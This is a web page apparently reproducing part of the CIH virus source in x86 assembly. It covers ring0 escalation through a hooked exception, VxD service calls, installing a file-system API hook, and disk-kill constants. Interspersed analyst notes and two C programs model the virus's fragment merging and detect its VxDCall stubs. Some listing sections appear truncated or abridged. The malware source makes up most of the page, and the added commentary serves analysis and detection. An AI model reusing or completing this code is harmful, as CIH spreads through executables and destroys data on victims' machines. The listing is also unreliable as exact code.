cih源代码.htm

From "CIH source code" · HTM code · 1,695 lines total · page 1/5

      <P>db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
      <P>db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h</P>
      <P>dd 00000000h, VirusSize</P>
      <P> </P>
      <P>OriginalAppEXE ENDS</P>
      <P> </P>
      <P>; ****************************************************************************</P>
      <P>; * My Virus Game *</P>
      <P>; ****************************************************************************</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Constant Define *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>TRUE = 1</P>
      <P>FALSE = 0</P>
      <P> </P>
      <P>DEBUG = TRUE</P>
      <P> </P>
      <P>MajorVirusVersion = 1</P>
      <P>MinorVirusVersion = 3</P>
      <P> </P>
      <P>VirusVersion = MajorVirusVersion*10h+MinorVirusVersion</P>
      <P> </P>
      <P> </P>
      <P>IF DEBUG</P>
      <P> </P>
      <P>FirstKillHardDiskNumber = 81h</P>
      <P>HookExceptionNumber = 05h</P>
      <P> </P>
      <P>ELSE</P>
      <P> </P>
      <P>FirstKillHardDiskNumber = 80h</P>
      <P>HookExceptionNumber = 03h</P>
      <P> </P>
      <P>ENDIF</P>
      <P> </P>
      <P> </P>
      <P>FileNameBufferSize = 7fh</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>VirusGame SEGMENT</P>
      <P> </P>
      <P>ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame</P>
      <P>ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Ring3 Virus Game Initial Program *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>MyVirusStart:</P>
      <P>push ebp</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Let's Modify Structured Exception *</P>
      <P>; * Handing, Prevent Exception Error *</P>
      <P>; * Occurrence, Especially in NT. *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>lea eax, [esp-04h*2]</P>
      <P> </P>
      <P>xor ebx, ebx</P>
      <P>xchg eax, fs:[ebx]</P>
      <P> </P>
      <P>call @0</P>
      <P>@0:</P>
      <P>pop ebx</P>
      <P> </P>
      <P>lea ecx, StopToRunVirusCode-@0[ebx]</P>
      <P>push ecx</P>
      <P> </P>
      <P>push eax</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Let's Modify *</P>
      <P> </P>
      <P>pop esi</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Generate Exception to Get Ring0 *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>int HookExceptionNumber ; GenerateException</P>
      <P>ReturnAddressOfEndException = $</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Merge All Virus Code Section *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>push esi</P>
      <P>mov esi, eax</P>
      <P> </P>
      <P>LoopOfMergeAllVirusCodeSection:</P>
      <P> </P>
      <P>mov ecx, [eax-04h]</P>
      <P> </P>
      <P>rep movsb</P>
      <P> </P>
      <P>sub eax, 08h</P>
      <P> </P>
      <P>mov esi, [eax]</P>
      <P> </P>
      <P>or esi, esi</P>
      <P>jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1</P>
      <P> </P>
      <P>jmp LoopOfMergeAllVirusCodeSection</P>
      <P> </P>
      <P>QuitLoopOfMergeAllVirusCodeSection:</P>
      <P> </P>
      <P>pop esi</P>
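      <P>Entering the loop above, EAX and ESI both hold the address of MyVirusStart and EDI holds the page returned by _PageAllocate. Each pass reads a fragment size from [EAX-4], copies that many bytes from ESI to EDI, steps EAX back eight bytes and loads the next fragment address from [EAX]; a zero ends the walk. The (next, size) pairs are therefore a table laid out backwards in front of the entry point, and the pair "dd 00000000h, VirusSize" at the end of OriginalAppEXE is its terminating entry for the single-fragment case. The C program below is an added example, not part of the CIH listing: it models exactly that walk over a constructed image (array offsets stand in for 32-bit addresses), which is what an analyst does to reassemble the virus body from an infected file. The fragment layout is inferred from the loop, not stated by the listing, and the bounds checks are added so a bad table cannot crash the model; the virus itself has none.</P>

```c
/* Added example (not part of the CIH listing): a C model of what
 * LoopOfMergeAllVirusCodeSection reads and copies. The image, its
 * fragments and the (next, size) table are constructed here. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

enum { IMAGE_SIZE = 0x200 };

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void wr32le(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Walk the backwards table and concatenate the fragments into out.
 * Returns bytes written, or 0 if any read or copy would leave img or out
 * (checks added for the model; the virus trusts the table). */
size_t merge_fragments(const uint8_t *img, size_t img_len, uint32_t entry,
                       uint8_t *out, size_t out_len)
{
    uint32_t tbl = entry;  /* EAX: walks the table downward  */
    uint32_t src = entry;  /* ESI: current fragment address  */
    size_t done = 0;       /* EDI minus page base            */

    for (;;) {
        if (tbl < 8 || tbl > img_len)
            return 0;
        uint32_t size = rd32le(img + tbl - 4);           /* mov ecx, [eax-04h] */
        if (src > img_len || size > img_len - src || size > out_len - done)
            return 0;
        memcpy(out + done, img + src, size);             /* rep movsb */
        done += size;
        tbl -= 8;                                        /* sub eax, 08h */
        src = rd32le(img + tbl);                         /* mov esi, [eax] */
        if (src == 0)                                    /* or esi, esi / jz */
            break;
    }
    return done;
}

/* Constructed image: three scattered fragments holding the first
 * instructions of MyVirusStart, plus the table in front of the entry.
 * Pair k = (address of fragment k+1, size of fragment k); last next = 0. */
uint32_t build_sample_image(uint8_t *img, size_t img_len)
{
    static const uint8_t frag_a[] = { 0x55, 0x8D, 0x44, 0x24, 0xF8 };       /* push ebp / lea eax,[esp-8] */
    static const uint8_t frag_b[] = { 0x33, 0xDB, 0x64, 0x87, 0x03 };       /* xor ebx,ebx / xchg eax,fs:[ebx] */
    static const uint8_t frag_c[] = { 0xE8, 0x00, 0x00, 0x00, 0x00, 0x5B }; /* call $+5 / pop ebx */
    const uint32_t entry = 0x100, addr_b = 0x180, addr_c = 0x1C0;

    memset(img, 0, img_len);
    memcpy(img + entry,  frag_a, sizeof frag_a);
    memcpy(img + addr_b, frag_b, sizeof frag_b);
    memcpy(img + addr_c, frag_c, sizeof frag_c);

    wr32le(img + entry - 8,  addr_b); wr32le(img + entry - 4,  sizeof frag_a);
    wr32le(img + entry - 16, addr_c); wr32le(img + entry - 12, sizeof frag_b);
    wr32le(img + entry - 24, 0);      wr32le(img + entry - 20, sizeof frag_c);
    return entry;
}

int main(void)
{
    uint8_t img[IMAGE_SIZE], merged[64];
    uint32_t entry = build_sample_image(img, sizeof img);
    size_t n = merge_fragments(img, sizeof img, entry, merged, sizeof merged);
    printf("merged %zu bytes:", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02X", merged[i]);
    printf("\n");
    return 0;
}
```

      <P>The model reads the table in the same order as the loop: size first, then the next address, so the size of fragment k sits beside the address of fragment k+1 rather than beside its own address. Swapping the two dwords when writing a table is the easy mistake; the merged bytes come out in the wrong order or the walk stops early.</P>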
      <P> </P>
      <P>; *************************************</P>
      <P>; * Generate Exception Again *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>int HookExceptionNumber ; GenerateException Again</P>
      <P> </P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Let's Restore *</P>
      <P>; * Structured Exception Handing *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>ReadyRestoreSE:</P>
      <P>sti</P>
      <P> </P>
      <P>xor ebx, ebx</P>
      <P> </P>
      <P>jmp RestoreSE</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * When Exception Error Occurs, *</P>
      <P>; * Our OS System should be in NT. *</P>
      <P>; * So My Cute Virus will not *</P>
      <P>; * Continue to Run, it Jmups to *</P>
      <P>; * Original Application to Run. *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>StopToRunVirusCode:</P>
      <P>@1 = StopToRunVirusCode</P>
      <P> </P>
      <P>xor ebx, ebx</P>
      <P>mov eax, fs:[ebx]</P>
      <P>mov esp, [eax]</P>
      <P> </P>
      <P>RestoreSE:</P>
      <P>pop dword ptr fs:[ebx]</P>
      <P>pop eax</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Return Original App to Execute *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>pop ebp</P>
      <P> </P>
      <P>push 00401000h ; Push Original</P>
      <P>OriginalAddressOfEntryPoint = $-4 ; App Entry Point to Stack</P>
      <P> </P>
      <P>ret ; Return to Original App Entry Point</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Ring0 Virus Game Initial Program *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>MyExceptionHook:</P>
      <P>@2 = MyExceptionHook</P>
      <P> </P>
      <P>jz InstallMyFileSystemApiHook</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Do My Virus Exist in System !? *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>mov ecx, dr0</P>
      <P>jecxz AllocateSystemMemoryPage</P>
      <P> </P>
      <P>add dword ptr [esp], ReadyRestoreSE-ReturnAddressOfEndException</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Return to Ring3 Initial Program *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>ExitRing0Init:</P>
      <P>mov [ebx-04h], bp ;</P>
      <P>shr ebp, 16 ; Restore Exception</P>
      <P>mov [ebx+02h], bp ;</P>
      <P> </P>
      <P>iretd</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Allocate SystemMemory Page to Use *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>AllocateSystemMemoryPage:</P>
      <P> </P>
      <P>mov dr0, ebx ; Set the Mark of My Virus Exist in System</P>
      <P> </P>
      <P>push 00000000fh ;</P>
      <P>push ecx ;</P>
      <P>push 0ffffffffh ;</P>
      <P>push ecx ;</P>
      <P>push ecx ;</P>
      <P>push ecx ;</P>
      <P>push 000000001h ;</P>
      <P>push 000000002h ;</P>
      <P>int 20h ; VMMCALL _PageAllocate</P>
      <P>_PageAllocate = $ ;</P>
      <P>dd 00010053h ; Use EAX, ECX, EDX, and flags</P>
      <P>add esp, 08h*04h</P>
      <P> </P>
      <P>xchg edi, eax ; EDI = SystemMemory Start Address</P>
      <P> </P>
      <P>lea eax, MyVirusStart-@2[esi]</P>
      <P> </P>
      <P>iretd ; Return to Ring3 Initial Program</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * Install My File System Api Hook *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>InstallMyFileSystemApiHook:</P>
      <P> </P>
      <P>lea eax, FileSystemApiHook-@6[edi]</P>
      <P> </P>
      <P>push eax ;</P>
      <P>int 20h ; VXDCALL IFSMgr_InstallFileSystemApiHook</P>
      <P>IFSMgr_InstallFileSystemApiHook = $ ;</P>
      <P>dd 00400067h ; Use EAX, ECX, EDX, and flags</P>
      <P> </P>
      <P>mov dr0, eax ; Save OldFileSystemApiHook Address</P>
      <P> </P>
      <P>pop eax ; EAX = FileSystemApiHook Address</P>
      <P> </P>
      <P>; Save Old IFSMgr_InstallFileSystemApiHook Entry Point</P>
      <P>mov ecx, IFSMgr_InstallFileSystemApiHook-@2[esi]</P>
      <P>mov edx, [ecx]</P>
      <P>mov OldInstallFileSystemApiHook-@3[eax], edx</P>
      <P> </P>
      <P>; Modify IFSMgr_InstallFileSystemApiHook Entry Point</P>
      <P>lea eax, InstallFileSystemApiHook-@3[eax]</P>
      <P>mov [ecx], eax</P>
      <P> </P>
      <P>cli</P>
      <P> </P>
      <P>jmp ExitRing0Init</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Code Size of Merge Virus Code Section *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>CodeSizeOfMergeVirusCodeSection = offset $</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * IFSMgr_InstallFileSystemApiHook *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>InstallFileSystemApiHook:</P>
      <P>push ebx</P>
      <P> </P>
      <P>call @4 ;</P>
      <P>@4: ;</P>
      <P>pop ebx ; mov ebx, offset FileSystemApiHook</P>
      <P>add ebx, FileSystemApiHook-@4 ;</P>
      <P> </P>
      <P>push ebx</P>
      <P>int 20h ; VXDCALL IFSMgr_RemoveFileSystemApiHook</P>
      <P>IFSMgr_RemoveFileSystemApiHook = $</P>
      <P>dd 00400068h ; Use EAX, ECX, EDX, and flags</P>
      <P>pop eax</P>
      <P> </P>
      <P>; Call Original IFSMgr_InstallFileSystemApiHook</P>
      <P>; to Link Client FileSystemApiHook</P>
      <P>push dword ptr [esp+8]</P>
      <P>call OldInstallFileSystemApiHook-@3[ebx]</P>
      <P>pop ecx</P>
      <P> </P>
      <P>push eax</P>
      <P> </P>
      <P>; Call Original IFSMgr_InstallFileSystemApiHook</P>
      <P>; to Link My FileSystemApiHook</P>
      <P>push ebx</P>
      <P>call OldInstallFileSystemApiHook-@3[ebx]</P>
      <P>pop ecx</P>
      <P> </P>
      <P>mov dr0, eax ; Adjust OldFileSystemApiHook Address</P>
      <P> </P>
      <P>pop eax</P>
      <P> </P>
      <P>pop ebx</P>
      <P> </P>
      <P>ret</P>
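      <P>Every ring0 service above goes through the same six-byte VxDCall stub: int 20h followed by a dword whose high word is the VxD device ID (0001h = VMM, 0040h = IFSMgr) and whose low word is the service ordinal, so 00010053h is VMM _PageAllocate and 00400067h and 00400068h are IFSMgr_InstallFileSystemApiHook and IFSMgr_RemoveFileSystemApiHook. On first execution the VMM's int 20h handler rewrites the stub in place into a six-byte call through the VxD's service table slot, so the dword after the opcode becomes the slot address. That is what the "= $" labels after each int 20h are for: InstallMyFileSystemApiHook reads the slot through that label, saves the real entry point in OldInstallFileSystemApiHook and overwrites the slot with its own InstallFileSystemApiHook, which is how every later hook installer is routed through the virus.</P>
      <P>The C program below is an added example, not part of the CIH listing: it scans a byte buffer for unpatched stubs and decodes them, as a triage script would when looking for ring0-only code inside a Win32 image. The three service names are the ones used in the listing; the sample buffer is constructed here and mirrors those three call sites; any other device/service pair is reported as unknown.</P>

```c
/* Added example (not part of the CIH listing): find and decode the
 * "int 20h / dd DeviceID:Service" VxDCall stubs used in the listing.
 * The stub is CD 20 followed by a little-endian dword: high word = VxD
 * device ID, low word = service ordinal. The sample bytes are constructed. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define VXDCALL_STUB_LEN 6   /* CD 20 + 4-byte service dword */

struct vxdcall {
    size_t   offset;     /* offset of the CD 20 opcode          */
    uint16_t device_id;  /* high word: VxD exporting the service */
    uint16_t service;    /* low word: service ordinal            */
};

static uint32_t rd32le(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Names for the three services the listing calls (0001h = VMM,
 * 0040h = IFSMgr); everything else is reported as unknown. */
const char *vxd_service_name(uint16_t device_id, uint16_t service)
{
    if (device_id == 0x0001 && service == 0x0053) return "VMM _PageAllocate";
    if (device_id == 0x0040 && service == 0x0067) return "IFSMgr_InstallFileSystemApiHook";
    if (device_id == 0x0040 && service == 0x0068) return "IFSMgr_RemoveFileSystemApiHook";
    return "unknown";
}

/* Scan buf for complete stubs. Fills out[] up to max entries and returns
 * the total number found (may exceed max, so a caller can size a buffer). */
size_t find_vxdcalls(const uint8_t *buf, size_t len,
                     struct vxdcall *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + VXDCALL_STUB_LEN <= len; i++) {
        if (buf[i] != 0xCD || buf[i + 1] != 0x20)
            continue;
        uint32_t id = rd32le(buf + i + 2);
        if (n < max) {
            out[n].offset    = i;
            out[n].device_id = (uint16_t)(id >> 16);
            out[n].service   = (uint16_t)(id & 0xFFFFu);
        }
        n++;
        i += VXDCALL_STUB_LEN - 1;   /* do not rescan the service dword */
    }
    return n;
}

/* Constructed bytes mirroring three call sites in the listing:
 *   push 02h / int 20h / dd 00010053h / add esp, 20h
 *   push eax / int 20h / dd 00400067h
 *   push ebx / int 20h / dd 00400068h / pop eax */
static const uint8_t sample[] = {
    0x6A, 0x02, 0xCD, 0x20, 0x53, 0x00, 0x01, 0x00, 0x83, 0xC4, 0x20,
    0x50, 0xCD, 0x20, 0x67, 0x00, 0x40, 0x00,
    0x53, 0xCD, 0x20, 0x68, 0x00, 0x40, 0x00, 0x58,
};

size_t scan_sample(struct vxdcall *out, size_t max)
{
    return find_vxdcalls(sample, sizeof sample, out, max);
}

int main(void)
{
    struct vxdcall hits[8];
    size_t n = scan_sample(hits, 8);
    for (size_t i = 0; i < n && i < 8; i++)
        printf("+%04zx  int 20h / dd %04X%04Xh  -> %s\n", hits[i].offset,
               hits[i].device_id, hits[i].service,
               vxd_service_name(hits[i].device_id, hits[i].service));
    return 0;
}
```

      <P>A Win32 application has no legitimate reason to carry such a stub; the encoding belongs to VxD code, and CIH can carry it only because it has already reached ring0 through the exception it raises before these bytes execute. The scanner matches the unpatched form only: once the VMM has rewritten a stub, the service dword is gone and only the slot address remains.</P>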
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * Static Data *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>OldInstallFileSystemApiHook dd ?</P>
      <P> </P>
      <P>; *********************************************************</P>
      <P>; * IFSMgr_FileSystemHook *</P>
      <P>; *********************************************************</P>
      <P> </P>
      <P>; *************************************</P>
      <P>; * IFSMgr_FileSystemHook Entry Point *</P>
      <P>; *************************************</P>
      <P> </P>
      <P>FileSystemApiHook:</P>
      <P>@3 = FileSystemApiHook</P>
      <P> </P>
      <P>pushad</P>
      <P> </P>
      <P>call @5 ;</P>
      <P>@5: ;</P>
      <P>pop esi ; mov esi, offset VirusGameDataSta
